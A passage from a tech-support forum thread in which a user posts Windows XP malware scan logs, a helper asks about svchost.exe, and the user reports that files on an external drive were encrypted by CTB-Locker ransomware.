¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 1 ¤¤¤
[H:\WINDOWS\system32\drivers\etc\hosts] 127.0.0.1       localhost
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] fq27hxil.default : user_pref("browser.startup.homepage", "http://www.cnn.com/"); -> Found
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD50 00AAKS-00Z7B SCSI Disk Device +++++
--- User ---
[MBR] 2ea7add702617c5d216234bebd8acd6e
[BSP] b69845ec91a0703232e871c52bad2105 : Windows XP|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 476929 MB [Windows XP Bootstrap | Windows XP Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )
 
+++++ PhysicalDrive1: Generic USB SD Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
+++++ PhysicalDrive2: Generic USB CF Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
+++++ PhysicalDrive3: Generic USB SM Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
+++++ PhysicalDrive4: Generic USB MS Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )


#13 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 27 June 2015 - 01:24 PM


If you have to restore you computer there was on point set on June 23 when you ran the Zoek tool.

Restore point was successfully created.
===

This is the IP that you are currently using. Can you relate to it?
http://whatismyipaddress.com/ip/64.233.217.2

===

H:\WINDOWS\system32\svchost.exe
That svchost.exe file may be corrupted.

Please run the farbar tool and search for it as you did the others.

Just enter svchost.exe in the text box.

===

#14 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 27 June 2015 - 06:06 PM

Farbar Recovery Scan Tool (x86) Version: 13-06-2015
Ran by Daniel at 2015-06-27 18:58:56
Running from E:\AV\frst
Boot Mode: Normal
 
================== Search Files: "svchost.exe" =============
 
H:\WINDOWS\system32\svchost.exe
[2004-08-04 00:56][2008-04-13 20:12] 0014336 ____A (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\svchost.exe
[2008-04-13 20:12][2008-04-13 20:12] 0014336 _____ (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]
 
H:\WINDOWS\ERDNT\cache\svchost.exe
[2011-07-15 07:13][2008-04-13 20:12] 0014336 ____A (Microsoft Corporation) 27c6d03bcdb8cfeb96b716f3d8be3e18      [File is signed]
 
H:\Program Files\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2015-06-18 00:58][2015-04-14 09:36] 0878392 ____A (MalwareBytes) 4518dd9a09b4fef7db3b13f0ddddd36e      [File is signed]
 
====== End of Search ======


#15 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 27 June 2015 - 09:17 PM

I unconnected my external hard drives.

 

Connected one to my laptop that I've been doing all this posting on.

 

 

I noticed all files on the external hard drive had a "strange" extension.

 

I found an unencrypted jpg and it reads "your files are encrypted by CTB-Locker"

 

Super....






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users